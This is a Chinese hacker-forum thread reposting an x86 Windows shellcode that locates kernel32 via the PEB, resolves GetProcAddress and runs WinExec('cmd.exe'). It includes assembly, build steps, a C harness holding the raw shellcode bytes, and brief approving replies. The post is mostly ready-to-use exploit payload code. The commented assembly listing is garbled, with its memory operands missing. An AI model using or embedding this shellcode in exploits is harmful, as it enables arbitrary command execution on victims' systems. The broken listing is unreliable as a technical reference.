社区首页 › 漏洞情报 › Windows/x86 WinExec("cmd.exe",0) Shellcode

90_ 发表于 2016-6-8 09:28:28

Windows/x86 WinExec("cmd.exe",0) Shellcode

/*
   # Title : Windows x86 WinExec("cmd.exe",0) shellcode
   # Date : 07/06/2016
   # Author : Roziul Hasan Khan Shifat
   # Tested On : Windows 7 Professional x86
*/
  
/*
To Compile:
--------------
  
$nasm -f win32 winexec.asm -o exec.obj
  
  
Linking:
----------
$ "C:\Program Files\CodeBlocks\MinGW\bin\ld.exe" -o winexec.exe exec.obj
  
  
*/
  
/*
  
section .text
    global _start
_start:
  
;Finding base address of kernel32.dll
  
xor ecx,ecx
mov eax, ;loading PEB(Process Environment Block) in Eax
mov eax, ;Eax=PEB->Ldr
mov esi, ;Eax=Peb->Ldr.InMemOrderModuleList
lodsd ;Eax=second module of InMemOrderModuleList (ntdll.dll)
xchg eax,esi ;Eax=Esi ,Esi=Eax
lodsd ;Eax=third module of InMemOrderModuleList (kernel32.dll)
mov ebx, ;Ebx=base Address of Kernel32.dll (PVOID Dllbase)
  
;-------------------------------------------------------------------------------------------------------
  
  
  
;Finding Export table of Kernel32.dll
  
mov edx, ;(kernel32.dll base address+0x3c)=DOS->e_lfanew
add edx,ebx ;(DOS->e_lfanew+base address of kernel32.dll)=PE Header
mov edx, ;(PE Header+0x78)=DataDirectory->VirtualAddress
add edx,ebx ; (DataDirectory->VirtualAddress+kernel32.dll base address)=Export table of kernel32.dll (IMAGE_EXPORT_DIRECTORY)
mov esi, ;(IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames
add esi,ebx ; ESI=(AddressOfNames+kernel32.dll base address)=kernel32.dll AddressOfNames
xor ecx,ecx
  
;--------------------------------------------------------------------------------------------------------------
  
  
;finding GetProcAddress function name
  
Get_func:
  
inc ecx ;Incrementing the Ordinal
lodsd ;Get name Offset
add eax,ebx ;(name offset+kernel32.dll base address)=Get Function name
cmp dword ,0x50746547 ;GetP
jnz Get_func
cmp dword ,0x41636f72 ; rocA
jnz Get_func
cmp dword ,0x65726464 ; ddre
jnz Get_func
  
;-----------------------------------------------------------------------------------------------------------
  
  
  
;finding the address of GetProcAddress
  
mov esi, ;Esi=(IMAGE_EXPORT_DIRECTORY+0x24)=AddressOfNameOrdinals
add esi,ebx ;(AddressOfNameOrdinals+base address of kernel32.dll)=AddressOfNameOrdinals of kernel32.dll
mov cx, ;CX=Number of Function
dec ecx
mov esi, ;(IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions
add esi,ebx ;ESI=beginning of Address table
mov edx, ;EDX=Pointer(offset)
add edx,ebx ;Edx=Address of GetProcAddress
  
;-------------------------------------------------------------------------------------------------------
  
;backing up address of GetProcAddress because EAX,EBX,EDX,ECX Register value will be changed after calling function
xor esi,esi
push edx
pop esi
  
;----------------------------------------
  
;backing up kernel32.dll base address
xor edi,edi
push ebx
pop edi
  
;------------------------
;Finding address of Winexe()
xor ecx,ecx
push ecx
push 0x00636578
push 0x456e6957
  
mov ecx,esp
  
push ecx
push ebx
  
call edx
;-----------------------
;finding address of ExitProcess
xor ecx,ecx
push ecx
push 0x00737365
push 0x636f7250
push 0x74697845
  
mov ecx,esp
  
push ecx
push edi
  
xor edi,edi
mov edi,eax ;address of WinExec
  
call esi
  
;---------------
  
xor esi,esi
push eax
pop esi ;address of ExitProcess
;-------------------
;calling winexec
xor ecx,ecx
push ecx
push 0x00657865
push 0x2e646d63
  
mov ecx,esp
  
push 0
push ecx
  
call edi
  
;--------------
;exiting
push 0
call esi
  
*/
  
  
  
  
  
  
#include<stdio.h>
  
char shellcode[]=\
  
"\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x52\x5e\x31\xff\x53\x5f\x31\xc9\x51\x68\x78\x65\x63\x00\x68\x57\x69\x6e\x45\x89\xe1\x51\x53\xff\xd2\x31\xc9\x51\x68\x65\x73\x73\x00\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x89\xe1\x51\x57\x31\xff\x89\xc7\xff\xd6\x31\xf6\x50\x5e\x31\xc9\x51\x68\x65\x78\x65\x00\x68\x63\x6d\x64\x2e\x89\xe1\x6a\x00\x51\xff\xd7\x6a\x00\xff\xd6\xff\xff\xff\xff\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00";
  
main()
{
  
(* (int(*)()) shellcode)();
}

菜鸟小羽 发表于 2016-6-8 09:30:38

支持，看起来还是可以的

H.U.C—Prince 发表于 2016-6-8 09:52:15

支持，看起来还是可以的

小龙 发表于 2016-6-8 10:27:13

支持中国红客联盟(ihonker.org)

wtsqq123 发表于 2016-6-8 14:04:59

我是来水经验的……

云游者 发表于 2016-6-8 15:07:56

wanmznh 发表于 2016-6-8 15:14:36

Sty，涛 发表于 2016-6-8 16:56:00

r00tc4 发表于 2016-6-8 18:31:54

支持中国红客联盟(ihonker.org)

arctic 发表于 2016-6-8 18:44:52

支持，看起来还是可以的

查看完整版本: Windows/x86 WinExec("cmd.exe",0) Shellcode